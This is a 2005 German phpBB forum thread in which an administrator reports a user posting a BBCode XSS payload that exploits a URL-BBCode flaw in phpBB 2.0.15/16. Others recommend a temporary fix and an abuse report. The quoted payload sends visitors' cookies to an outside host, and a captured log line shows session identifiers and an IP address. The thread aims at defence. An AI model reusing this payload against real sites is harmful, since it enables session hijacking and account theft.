phpBB.de

phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/

Benutzer zeichnet das Forum auf.

https://www.phpbb.de/community/viewtopic.php?t=93158

Seite 1 von 1

Benutzer zeichnet das Forum auf.

Verfasst: 19.07.2005 15:51
von Alrik
Hallo

In meinem Forum benutzt ein Benutzer regelmäßgig folgenden Code:


In seinem Post:

Code: Alles auswählen

[quote][color=#ab8c5b][url]www.ut[url=www.s=''style='font-size:0;color:#ab8c5b'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://duffbear.du.funpic.de/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
Und angezeigt wird es gar nicht, aber im Quelltext sieht man:

Code: Alles auswählen

<span style="color: #ab8c5b"><a href="http://www.ut<a href="http://www.s=''style='font-size:0;color:#ab8c5b'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://duffbear.du.funpic.de/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;" target="_blank" class="postlink">" target="_blank" class="postlink">www.ut[url=www.s=''style='font-size:0;color:#ab8c5b'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i._='http://duffbear.du.funpic.de/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;]</a></a>'</span></span><span class="gensmall"></span></td>

Dann habe ich mal versucht es nachzuvollziehen und vermute dass er immer solche Dinge aufzeichnet:

Code: Alles auswählen

Cookie: phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:32:\"06643c866b60159431eda050e5e6b6ec\";s:6:\"userid\";i:2;}; phpbb2mysql_sid=5d659961fdbe13d88564d0bb3c2587c4; phpbb2mysql_t=a:1:{i:164;i:1121780380;}
IP: 80.136.94.159
Date and Time: 19 July, 2005, 3:39 pm
Referer: http://www.wettschlacht.de/sp/phpBB2/viewtopic.php?t=164&postdays=0&postorder=asc&start=0&sid=5d659961fdbe13d88564d0bb3c2587c4
Client: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)


Könnt ihr mir erklären wie ich es schaffe, dass dies nicht mehr möglich ist in meinem Forum? (phpBB 2.0.15 mit dem behobenen Fehler von 2.0.16)


Danke.

Verfasst: 19.07.2005 16:05
von Christian Benz
Hi,

scheint die aktuelle Lücke zu sein.
Solange das Update auf 2.0.17 noch nicht da ist, kannst du dir evtl. damit behelfen:
http://www.phpbb2.de/portal.php?topic_id=30123
Temporary fix for security issue in URL BBcode (phpBB 2.0.16)
Gruß,
Chris

Verfasst: 19.07.2005 17:02
von punkface
Sperr erstmal den Account in deinem Forum, und schreib dann den Funpic.de Admin (abuse@funpic.de) an, er soll den Account duffbear sperren, weil von dem Account aus Daten in deinem Forum ausspioniert werden .. siehe http://duffbear.du.funpic.de/

Verfasst: 19.07.2005 19:23
von Alrik
Danke. Genau das war das Problem.

@punkface: Eine gute Idee. Ich habe den Betreiber mal angeschrieben.

Hat jemand eine Ahnung ob man in einem solchen Fall, wie diesem hier eine Anzeige gegen den Benutzer erstatten könnte? (Ich weiß genau wer er ist)


Woher bekommt man denn am besten in Zukunft schnell infos über neue Sicherheitslücken?
Alle Zeiten sind UTC+02:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de